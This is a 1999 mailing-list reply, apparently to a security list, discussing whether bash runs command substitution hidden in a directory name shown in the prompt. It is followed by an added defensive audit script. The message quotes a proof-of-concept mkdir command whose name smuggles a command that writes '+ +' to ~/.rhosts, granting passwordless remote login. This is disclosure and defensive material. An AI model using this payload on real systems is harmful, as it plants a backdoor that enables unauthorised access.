On Tue, Apr 20, 1999 at 09:25:47PM -0400, Shadow wrote:
>
> If a user creates a directory with a command like
>
> mkdir "\ `echo -e \ "echo + +> ~\57.rhosts\ " > x; source x; rm -f \x\ ` "

It seems to me that this is related to the prompt string parsing. If yes,
then bash is not vulnerable unless configured to display the current
directory (correct me if the root of the problem is different).

Some additional notes:

- I was unable to reproduce this on my system, even when bash is configured
  to display the current path in the prompt. (bash 2.02.1(1))
- The original example seemed to have too much whitespace. I used:

  mkdir "\`echo -e \"echo + +> ~\57.rhosts\" > x; source x; rm -f \x\`"

- PS1 was set to \h:\w\$

HTH

-- 
      -----==-                                             |
      ----==-- _                                           |
      ---==---(_)__  __ ____  __       Marc Lehmann      +--
      --==---/ / _ \/ // /\ \/ /       pcgat_private     |e|
      -=====/_/_//_/\_,_/ /_/\_\       XX11-RIPE         --+
    The choice of a GNU generation                       |
                                                         |
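Added example, not part of the original message or of bash: a defender's check built on the point made above, that exposure depends on the prompt displaying the current directory. The function names are hypothetical and the sample directory name is constructed and harmless.

```shell
#!/bin/sh
# Added example: audit a prompt string and a directory tree for the
# condition discussed in the message above.

# Succeeds if the prompt string contains \w or \W (working-directory escapes).
prompt_shows_cwd() {
    case "$1" in
        *'\w'*|*'\W'*) return 0 ;;
        *) return 1 ;;
    esac
}

# Prints directories under $1 whose names contain a backtick or "$(".
find_risky_dirs() {
    find "$1" -type d \( -name '*`*' -o -name '*$(*' \) -print 2>/dev/null
}

# usage: audit_prompt PS1_STRING ROOT
# Returns 1 only when the prompt embeds the cwd AND risky names exist.
audit_prompt() {
    prompt_shows_cwd "$1" || return 0
    hits=$(find_risky_dirs "$2")
    if [ -z "$hits" ]; then
        return 0
    fi
    printf 'prompt embeds cwd; review these directories:\n%s\n' "$hits"
    return 1
}

# Constructed sample: one ordinary directory, one with backticks in its name.
demo=$(mktemp -d)
mkdir "$demo/ok" "$demo"/'a`true`b'
# PS1 value taken from the message above.
audit_prompt '\h:\w\$ ' "$demo" || echo "needs review"
rm -rf "$demo"
```

A non-zero result only flags names worth reviewing; whether a given shell version actually evaluates them in the prompt has to be tested on that version.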
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:43:30 PDT